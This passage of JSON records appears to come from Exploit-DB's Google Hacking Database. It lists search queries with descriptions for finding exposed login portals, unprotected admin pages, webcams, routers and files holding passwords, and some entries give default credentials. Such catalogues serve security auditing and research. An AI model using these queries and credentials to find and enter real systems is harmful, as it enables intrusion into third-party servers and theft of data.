-wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/" }, { "signatureReferenceNumber": "802", "link": "https://www.exploit-db.com/ghdb/802/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aupload+inurl%3Aupload+intext%3Aupload+-forum+-shop+-support+-w3c+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en", "shortDescription": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "textualDescription": "The search reveals server upload portals.An attacker can use server space for his own benefit." }, { "signatureReferenceNumber": "803", "link": "https://www.exploit-db.com/ghdb/803/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22SpeedStream+*+Management+Interface%22&btnG=Search", "shortDescription": "intitle:\"SpeedStream * Management Interface\"", "textualDescription": "a lot of Speed stream routers :)" }, { "signatureReferenceNumber": "804", "link": "https://www.exploit-db.com/ghdb/804/", "category": "Sensitive Directories", "querystring": "http://www.google.de/search?hl=de&q=intitle%3A%22HFS+%2F%22+%2B%22HttpFileServer%22&btnG=Google-Suche&meta=", "shortDescription": "intitle:\"HFS /\" +\"HttpFileServer\"", "textualDescription": "\"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well.\" http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516" }, { "signatureReferenceNumber": "805", "link": "https://www.exploit-db.com/ghdb/805/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:%22next_file=main_fs.htm%22+inurl:img+inurl:image.cgi", "shortDescription": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "textualDescription": "Linksys Wireless-G web cams." }, { "signatureReferenceNumber": "806", "link": "https://www.exploit-db.com/ghdb/806/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22There+are+no+Administrators+Accounts%22+inurl%3Aadmin.php+-mysql_fetch_row", "shortDescription": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "textualDescription": "This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken." }, { "signatureReferenceNumber": "807", "link": "https://www.exploit-db.com/ghdb/807/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Actt+Contact&btnG=Search", "shortDescription": "filetype:ctt Contact", "textualDescription": "This is for MSN Contact lists..." }, { "signatureReferenceNumber": "808", "link": "https://www.exploit-db.com/ghdb/808/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Actt+%22msn%22&btnG=Search", "shortDescription": "Peoples MSN contact lists", "textualDescription": "This will give msn contact lists .. modify the \"msn\" to what ever you feel is messenger related" }, { "signatureReferenceNumber": "809", "link": "https://www.exploit-db.com/ghdb/809/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3Aservlet%2Fwebacc", "shortDescription": "inurl:servlet/webacc", "textualDescription": "I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=\"> this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context" }, { "signatureReferenceNumber": "810", "link": "https://www.exploit-db.com/ghdb/810/", "category": "Sensitive Directories", "querystring": "http://www.google.com.my/search?q=%22Web+File+Browser%22+%22Use+regular+expression%22&btnG=Search&hl=en", "shortDescription": "\"Web File Browser\" \"Use regular expression\"", "textualDescription": "This will ask google to search for a php script used to manage files on a server. The script \"Web File Browser\" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server." }, { "signatureReferenceNumber": "811", "link": "https://www.exploit-db.com/ghdb/811/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext%3Agmail+invite+intext%3Ahttp%3A%2F%2Fgmail.google.com%2Fgmail%2Fa&btnG=Search", "shortDescription": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "textualDescription": "This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding \"+blog\", \"+livejournal\", or , \"+forum\"." }, { "signatureReferenceNumber": "812", "link": "https://www.exploit-db.com/ghdb/812/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=filetype:cgi+transcoder.cgi&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "filetype:cgi transcoder.cgi", "textualDescription": "Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices." }, { "signatureReferenceNumber": "813", "link": "https://www.exploit-db.com/ghdb/813/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Setup+Home%22+%22You+will+need+*+log+in+before+*+*+change+*+settings%22", "shortDescription": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "textualDescription": "This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security." }, { "signatureReferenceNumber": "814", "link": "https://www.exploit-db.com/ghdb/814/", "category": "Sensitive Directories", "querystring": "http://www.google.co.uk/search?hl=en&q=%22Index+of%22+rar+r01+nfo+Modified+2004&btnG=Search&meta=", "shortDescription": "\"Index of\" rar r01 nfo Modified 2004", "textualDescription": "New Warez Directory Lists" }, { "signatureReferenceNumber": "815", "link": "https://www.exploit-db.com/ghdb/815/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Network+Print+Server%22+filetype:shtm+(+inurl:u_printjobs+%7C+inurl:u_server+%7C+inurl:a_server+%7C+inurl:u_generalhelp+%7C+u_printjobs+)&num=100&hl=en&lr=&fi", "shortDescription": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "textualDescription": "Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future." }, { "signatureReferenceNumber": "816", "link": "https://www.exploit-db.com/ghdb/816/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22Network+Print+Server%22+intext%3A%22http%3A%2F%2Fwww.axis.com%22+filetype%3Ashtm", "shortDescription": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "textualDescription": "Axis Network Print Server devices (a better shorter search)." }, { "signatureReferenceNumber": "817", "link": "https://www.exploit-db.com/ghdb/817/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22pcANYWHERE+EXPRESS+Java+Client%22", "shortDescription": "\"pcANYWHERE EXPRESS Java Client\"", "textualDescription": "This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web." }, { "signatureReferenceNumber": "818", "link": "https://www.exploit-db.com/ghdb/818/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22Activex%2Fdefault.htm%22+%22Demo%22", "shortDescription": "inurl:\"Activex/default.htm\" \"Demo\"", "textualDescription": "This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web." }, { "signatureReferenceNumber": "819", "link": "https://www.exploit-db.com/ghdb/819/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22FTP+root+at%22", "shortDescription": "intitle:\"FTP root at\"", "textualDescription": "This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password." }, { "signatureReferenceNumber": "820", "link": "https://www.exploit-db.com/ghdb/820/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22VNC+viewer+for+Java%22", "shortDescription": "intitle:\"VNC viewer for Java\"", "textualDescription": "VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident." }, { "signatureReferenceNumber": "821", "link": "https://www.exploit-db.com/ghdb/821/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Atorrent+torrent", "shortDescription": "filetype:torrent torrent", "textualDescription": "Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html.." }, { "signatureReferenceNumber": "822", "link": "https://www.exploit-db.com/ghdb/822/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:%22631/admin%22+(inurl:%22op%3D*%22)+%7C+(intitle:CUPS)+&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "textualDescription": "Administration pages for CUPS, The Common UNIX Printing System. Most are password protected." }, { "signatureReferenceNumber": "823", "link": "https://www.exploit-db.com/ghdb/823/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22PHPhotoalbum+-+Upload%22+%7C+inurl%3A%22PHPhotoalbum%2Fupload%22", "shortDescription": "PHPhotoalbum Upload", "textualDescription": "Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums." }, { "signatureReferenceNumber": "824", "link": "https://www.exploit-db.com/ghdb/824/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3APHPhotoalbum%2Fstatistics+intitle%3A%22PHPhotoalbum+-+Statistics%22", "shortDescription": "PHPhotoalbum Statistics", "textualDescription": "PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums." }, { "signatureReferenceNumber": "825", "link": "https://www.exploit-db.com/ghdb/825/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&q=-Login+inurl%3Aphotopost%2Fuploadphoto.php&btnG=Search", "shortDescription": "PhotoPost PHP Upload", "textualDescription": "PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users." }, { "signatureReferenceNumber": "826", "link": "https://www.exploit-db.com/ghdb/826/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.de/search?q=intext%3AGenerated.by.phpix.1.0%3F+inurl%3A%24mode%3Dalbum", "shortDescription": "uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album", "textualDescription": "Product: PHPix Version: 1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html" }, { "signatureReferenceNumber": "827", "link": "https://www.exploit-db.com/ghdb/827/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?client=safari&rls=en&q=XAMPP+%22inurl:xampp/index%22&ie=UTF-8&oe=UTF-8", "shortDescription": "XAMPP \"inurl:xampp/index\"", "textualDescription": "XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things ;-)" }, { "signatureReferenceNumber": "828", "link": "https://www.exploit-db.com/ghdb/828/", "category": "Various Online Devices", "querystring": "http://www.google.de/search?q=intitle%3A%22Browser+Launch+Page%22", "shortDescription": "intitle:\"Browser Launch Page\"", "textualDescription": "An ActiveX based webcam - so use MS IE" }, { "signatureReferenceNumber": "829", "link": "https://www.exploit-db.com/ghdb/829/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22Mail+admins+login+here+to+administrate+your+domain.%22", "shortDescription": "intext:\"Mail admins login here to administrate your domain.\"", "textualDescription": "Another way to locate Postfix admin logon pages." }, { "signatureReferenceNumber": "830", "link": "https://www.exploit-db.com/ghdb/830/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Acitrix%2Fmetaframexp%2Fdefault%2Flogin.asp%3FClientDetection%3DOn&btnG=Google+Search", "shortDescription": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "textualDescription": "Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to \"published\" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. As reported on Securiteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in the advisory." }, { "signatureReferenceNumber": "831", "link": "https://www.exploit-db.com/ghdb/831/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Atxt+inurl%3Adxdiag&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-GB:official", "shortDescription": "ext:txt inurl:dxdiag", "textualDescription": "This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination." }, { "signatureReferenceNumber": "832", "link": "https://www.exploit-db.com/ghdb/832/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%22usysinfo%3Flogin%3Dtrue%22", "shortDescription": "inurl:\"usysinfo?login=true\"", "textualDescription": "Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditionsDell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).Another possible search for this is:\"Log in.\" inurl:1311/servlet/" }, { "signatureReferenceNumber": "833", "link": "https://www.exploit-db.com/ghdb/833/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:%22/NSearch/AdminServlet%22&filter=0", "shortDescription": "inurl:\"/NSearch/AdminServlet\"", "textualDescription": "This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'." }, { "signatureReferenceNumber": "834", "link": "https://www.exploit-db.com/ghdb/834/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=%22Netware+*+Home%22+inurl%3Anav.html", "shortDescription": "\"Netware * Home\" inurl:nav.html", "textualDescription": "Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!" }, { "signatureReferenceNumber": "835", "link": "https://www.exploit-db.com/ghdb/835/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22Error+Message+%3A+Error+loading+required+libraries.%22", "shortDescription": "intext:\"Error Message : Error loading required libraries.\"", "textualDescription": "This throws up pages which contain \"CGI ERROR\" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form \"Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26\"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!" }, { "signatureReferenceNumber": "836", "link": "https://www.exploit-db.com/ghdb/836/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=50&q=ext%3Areg+%22username%3D*%22+putty", "shortDescription": "ext:reg \"username=*\" putty", "textualDescription": "Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc)." }, { "signatureReferenceNumber": "837", "link": "https://www.exploit-db.com/ghdb/837/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?&q=allinurl%3Aindex.htm%3Fcus%3Faudio", "shortDescription": "allinurl:index.htm?cus?audio", "textualDescription": "This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only .." }, { "signatureReferenceNumber": "838", "link": "https://www.exploit-db.com/ghdb/838/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle%3A%22edna%3Astreaming+mp3+server%22+-forums", "shortDescription": "intitle:\"edna:streaming mp3 server\" -forums", "textualDescription": "Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:\"edna:*\" intitle:\"edna: Site Statistics\"" }, { "signatureReferenceNumber": "839", "link": "https://www.exploit-db.com/ghdb/839/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22ePowerSwitch+Login%22&btnG=Search", "shortDescription": "intitle:\"ePowerSwitch Login\"", "textualDescription": "With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device." }, { "signatureReferenceNumber": "840", "link": "https://www.exploit-db.com/ghdb/840/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext%3Aini+Version%3D4.0.0.4+password", "shortDescription": "ext:ini Version=4.0.0.4 password", "textualDescription": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide." }, { "signatureReferenceNumber": "841", "link": "https://www.exploit-db.com/ghdb/841/", "category": "Pages containing login portals", "querystring": "http://www.google.de/search?q=inurl%3Aorasso.wwsso_app_admin.ls_login&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:orasso.wwsso_app_admin.ls_login", "textualDescription": "Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below." }, { "signatureReferenceNumber": "842", "link": "https://www.exploit-db.com/ghdb/842/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Aoraweb+-site%3Aoraweb.org&btnG=Search", "shortDescription": "inurl:oraweb -site:oraweb.org", "textualDescription": "Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb." }, { "signatureReferenceNumber": "843", "link": "https://www.exploit-db.com/ghdb/843/", "category": "Pages containing login portals", "querystring": "http://www.google.de/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3AGroup-Office+%22Enter+your+username+and+password+to+login%22&btnG=Search", "shortDescription": "intitle:Group-Office \"Enter your username and password to login\"", "textualDescription": "Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online." }, { "signatureReferenceNumber": "844", "link": "https://www.exploit-db.com/ghdb/844/", "category": "Various Online Devices", "querystring": "http://www.google.de/search?q=inurl%3A%228003%2FDisplay%3Fwhat%3D%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:\"8003/Display?what=\"", "textualDescription": "Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, and generating reports." }, { "signatureReferenceNumber": "845", "link": "https://www.exploit-db.com/ghdb/845/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22EverFocus.EDSR.applet%22", "shortDescription": "intitle:\"EverFocus.EDSR.applet\"", "textualDescription": "The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs." }, { "signatureReferenceNumber": "846", "link": "https://www.exploit-db.com/ghdb/846/", "category": "Files containing juicy info", "querystring": "http://www.google.de/search?q=inurl%3Anetscape.ini+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:netscape.ini", "textualDescription": "There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\\Tx\\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications" }, { "signatureReferenceNumber": "847", "link": "https://www.exploit-db.com/ghdb/847/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Anetscape.hst+", "shortDescription": "inurl:netscape.hst", "textualDescription": "Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list" }, { "signatureReferenceNumber": "848", "link": "https://www.exploit-db.com/ghdb/848/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3A%22bookmark.htm%22", "shortDescription": "inurl:\"bookmark.htm\"", "textualDescription": "Bookmarks for Netscape and various other browsers." }, { "signatureReferenceNumber": "849", "link": "https://www.exploit-db.com/ghdb/849/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Anetscape.hst+", "shortDescription": "inurl:netscape.hst", "textualDescription": "History for Netscape - So an attacker can read a user's browsing history." }, { "signatureReferenceNumber": "850", "link": "https://www.exploit-db.com/ghdb/850/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=%22powered+%7C+performed+by+Beyond+Security%27s+Automated+Scanning%22+-kazaa+-example", "shortDescription": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "textualDescription": "This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?!" }, { "signatureReferenceNumber": "851", "link": "https://www.exploit-db.com/ghdb/851/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22EpsonNet+WebAssist+Rev%22", "shortDescription": "intitle:\"EpsonNet WebAssist Rev\"", "textualDescription": "This reveals the Epson Web Assist page (internal to the machine)" }, { "signatureReferenceNumber": "852", "link": "https://www.exploit-db.com/ghdb/852/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SquirrelMail+version+1.4.4%22+inurl%3Asrc+ext%3Aphp", "shortDescription": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "textualDescription": "date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On." }, { "signatureReferenceNumber": "853", "link": "https://www.exploit-db.com/ghdb/853/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3Ana_admin", "shortDescription": "inurl:na_admin", "textualDescription": "This searches for the admin pages for a \"Network Appliance\" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db" }, { "signatureReferenceNumber": "854", "link": "https://www.exploit-db.com/ghdb/854/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Connection+Status%22+intext%3A%22Current+login%22", "shortDescription": "intitle:"Connection Status" intext:"Current login"", "textualDescription": "This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!" }, { "signatureReferenceNumber": "855", "link": "https://www.exploit-db.com/ghdb/855/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22welcome+to+netware+*%22+-site%3Anovell.com", "shortDescription": "intitle:\"welcome to netware *\" -site:novell.com", "textualDescription": "Novell login portals offering various services storage, printing, email or LDAP access" }, { "signatureReferenceNumber": "856", "link": "https://www.exploit-db.com/ghdb/856/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-50,GGLD:en&q=intitle%3A%22Brother%22+intext%3A%22View+Configuration%22+intext%3A%22Brother+Industries%2C+Ltd%2E%22", "shortDescription": "intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."", "textualDescription": "Finds a real bunch of Brother printers" }, { "signatureReferenceNumber": "857", "link": "https://www.exploit-db.com/ghdb/857/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype%3Ainc+mysql_connect+OR+mysql_pconnect", "shortDescription": "filetype:inc mysql_connect OR mysql_pconnect", "textualDescription": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database." }, { "signatureReferenceNumber": "858", "link": "https://www.exploit-db.com/ghdb/858/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22IceWarp+Web+Mail+5.3.0%22+%22Powered+by+IceWarp%22", "shortDescription": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "textualDescription": "IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/" }, { "signatureReferenceNumber": "859", "link": "https://www.exploit-db.com/ghdb/859/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&btnG=Search&hl=en&lr=&c2coff=1", "shortDescription": ""Powered by DUpaypal" -site:duware.com", "textualDescription": "Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb" }, { "signatureReferenceNumber": "860", "link": "https://www.exploit-db.com/ghdb/860/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=-site%3Aphp.net+-%22The+PHP+Group%22+inurl%3Asource++inurl%3Aurl+ext%3ApHp", "shortDescription": "-site:php.net -\"The PHP Group\" inurl:source inurl:url ext:pHp", "textualDescription": "scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)" }, { "signatureReferenceNumber": "861", "link": "https://www.exploit-db.com/ghdb/861/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Microsoft+CRM+%3A+Unsupported+Browser+Version%22", "shortDescription": "\"Microsoft CRM : Unsupported Browser Version\"", "textualDescription": "Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009denabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality." }, { "signatureReferenceNumber": "862", "link": "https://www.exploit-db.com/ghdb/862/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22switch+login%22+%22IBM+Fast+Ethernet+Desktop%22&btnG=Search", "shortDescription": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "textualDescription": "IBM 8275 Model 416 High Performance Ethernet Workgroup Switch" }, { "signatureReferenceNumber": "863", "link": "https://www.exploit-db.com/ghdb/863/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%22Powered+by+Link+Department%22", "shortDescription": "\"Powered by Link Department\"", "textualDescription": "Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data." }, { "signatureReferenceNumber": "864", "link": "https://www.exploit-db.com/ghdb/864/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+MercuryBoard+%5Bv1%22&btnG=Search", "shortDescription": "\"Powered by MercuryBoard [v1\"", "textualDescription": "Exploit for 